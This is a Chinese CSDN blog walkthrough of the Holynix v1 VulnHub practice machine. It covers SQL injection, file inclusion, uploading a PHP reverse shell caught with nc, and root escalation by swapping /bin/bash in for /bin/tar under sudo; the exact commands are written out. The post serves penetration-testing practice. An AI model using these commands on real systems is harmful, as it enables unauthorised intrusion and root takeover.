holynix-v1靶机

最新推荐文章于 2024-07-30 22:13:50 发布

阿卡丽的神秘铺子

最新推荐文章于 2024-07-30 22:13:50 发布

阅读量241

点赞数 4

文章标签：网络安全

本文链接：https://blog.csdn.net/zdd1453691081/article/details/140781800

版权

信息收集：

靶机地址：https://www.vulnhub.com/entry/holynix-v1,20/

（1）修改mac地址为00:0C:29:BC:05:DE 在进行扫描发现ip

（2）目录扫描

（3）端口扫描

拿shell：

（1）登录界面发现sql注入

（2）扫描到账号密码

（3）登录一个账号，在Security这发现文件包含漏洞

（4）在kali里面生成payload

 locate php-reverse
 cp的时候不要换名字
 cp /usr/share/laudanum/php/php-reverse-shell.php  .\  
 vim php-reverse-shell.php
 tar cvf  php-reverse-shell.php

（5）vim修改ip和端口

（6）文件上传

（7）拼接访问

http://192.168.254.156/~etenenbaum/

（8）监听nc -lvnp端口反弹成功

提权：

（1）sudo -l

（2）提权

cd /tmp/
cp /bin/bash .
sudo chown root:root /tmp/bash
sudo mv /bin/tar /bin/tar.bak
sudo mv /tmp/bash /bin/tar
sudo /bin/tar
id
提权成功

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

阿卡丽的神秘铺子

关注关注

4
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
holynix-v1靶机

【代码】holynix-v1靶机。
复制链接

扫一扫

vulnhub系列：holynix-v1靶机

jq_j37的博客

07-29

261

holynix-v1靶机，打靶

HOLYNIX: V1靶机

weixin_71232352的博客

07-12

292

【代码】HOLYNIX: V1靶机。

参与评论您还未登录，请先登录后发表或查看评论

holynix-v1靶机，提权

hqy250019的博客

07-29

298

抓包，尝试水平越权，把id改为其他的，因为刚刚在username中看到很多用户。点击login，发现用户登录，使用弱口令测试一下，登陆不上，测试SQL。更改文件 /tmp/bash 的所有权，以便从此 root 成为所有者。执行命令 /bin/tar（理想情况下运行 /bin/bash）将现有的 /bin/tar 文件备份到 bin/tar.bak。现在将 /tmp/bash 文件移动到 /bin/tar。将 /bin/bash 文件复制到 /tmp 文件夹。访问192.168.111.148。

Holynix:V1靶机

m0_65285254的博客

07-30

168

用户登录框存在sql注入，以POST方式提交，参数在请求数据中，将请求数据包保存到txt文件中，使用sqlmap爆破用户账号密码。修改后缀名，tar czf shell.tar.gz php-reverse-shell.php。打开文件上传位置，etenenbaum家目录发现上传的文件解析不了。使用kali上的nmap工具进行端口扫描，找到目标ip地址。不断登录账号，发现账号etenenbaum拥有上传文件权限。自动解析为shell.php文件，kali监听。编辑文件，修改为kali的ip。

Vulnhub靶机：HOLYNIX_ V1

LainWith的博客

12-23

2300

Holynix（此系列共2台）发布日期：2010年11月27日难度：中运行环境：VMware Workstation目标：取得 root 权限补充：需要手工设置靶机的MAC为00:0c:29:bc:05:de，然后重启靶机才能获取到靶机IP主机发现端口扫描+漏洞扫描万能密码文件包含漏洞mv提权。

Holynix-v1打靶渗透(权限提升)

weixin_52487093的博客

07-30

379

【代码】Holynix-v1打靶渗透(权限提升)

HOLYNIX: V1靶机带提权

weixin_71232352的博客

07-30

291

使用Python提高交互性，然后切换用户。输入id查看权限发现脏牛提权成功。uname -a查看内核版本。切换到临时目录并远程下载。最后根据提示恢复备份文件。

HOLYNIX: V1

Mysmycbx的博客

03-18

323

holynix

Holynix v1 靶机

weixin_74232792的博客

07-29

390

但是并没有上传成功，可能是权限不够，尝试越权，修改cookie中的uid值为1，发现用户变成了alamo。压缩 tar czf shell.tar.gz shell.php，将压缩好的文件拖至本机进行上传。目录扫描，基本上没发现有利信息，那就从主页下手，看是否能登入后台。访问首页提示需要登录,抓登录的包，修改数据包，可能存在SQL注入。上传文件后，上传时记得勾选，kali监听本地的8888端口。看到上传文件处的选项，有个自解压的选项，尝试上传压缩包。发现文件上传点，先上传一个phpinfo。

Vulnhub靶机渗透测试 DC-8靶机

12-07

Vulnhub靶机渗透测试 DC-8靶机

vulnhub靶机实战-My-cmsms靶机

09-29

vulnhub靶机实战-My-cmsms靶机本文档将针对vulnhub靶机实战-My-cmsms靶机，详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。主机发现在靶机实战中，主机发现是指通过各种技术手段来发现目标网络中...

sqli-labs-master靶机

10-12

sqli-labs是一个专门为学习和测试SQL注入技术而设计的靶机平台，它提供了多个层次的练习，帮助用户逐步理解和掌握SQL注入的防范与应对策略。一、sqli-labs靶机介绍 sqli-labs靶机由一系列精心设计的挑战组成，每个...

DC-4靶机提权超详细过程

02-29

### DC-4靶机提权超详细过程 #### 一、前言本文将详细介绍如何在DC-4靶机上进行权限提升的过程，包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程，...

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8450

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

基于JavaWeb开发的图书管理系统 (源码+数据库).zip-大作业&课程设计

09-07

基于JavaWeb开发的图书管理系统 (源码+数据库).zip-大作业&课程设计，本资源中的源码都是经过本地编译过可运行的，评审分达到95分以上。资源项目的难度比较适中，内容都是经过助教老师审定过的能够满足学习、使用需求，如果有需要的话可以放心下载使用。基于JavaWeb开发的图书管理系统 (源码+数据库).zip-大作业&课程设计，本资源中的源码都是经过本地编译过可运行的，评审分达到95分以上。资源项目的难度比较适中，内容都是经过助教老师审定过的能够满足学习、使用需求，如果有需要的话可以放心下载使用。基于JavaWeb开发的图书管理系统 (源码+数据库).zip-大作业&课程设计，本资源中的源码都是经过本地编译过可运行的，评审分达到95分以上。资源项目的难度比较适中，内容都是经过助教老师审定过的能够满足学习、使用需求，如果有需要的话可以放心下载使用。基于JavaWeb开发的图书管理系统 (源码+数据库).zip-大作业&课程设计，本资源中的源码都是经过本地编译过可运行的，评审分达到95分以上。资源项目的难度比较适中，内容都是经过助教老师审定过的能够满足学习、使用需求如果。

武汉工程大学邮电与信息工程学院在广东2021-2024各专业最低录取分数及位次表.pdf

holynix-v1靶机

信息收集：

（1）修改mac地址为00:0C:29:BC:05:DE 在进行扫描发现ip

（2）目录扫描

（3）端口扫描

拿shell：

（1）登录界面发现sql注入

（2）扫描到账号密码

（3）登录一个账号，在Security这发现文件包含漏洞

（4）在kali里面生成payload

（5）vim修改ip和端口

（6）文件上传

（7）拼接访问

（8）监听nc -lvnp端口 反弹成功

提权：

（1）sudo -l

（2）提权

（8）监听nc -lvnp端口反弹成功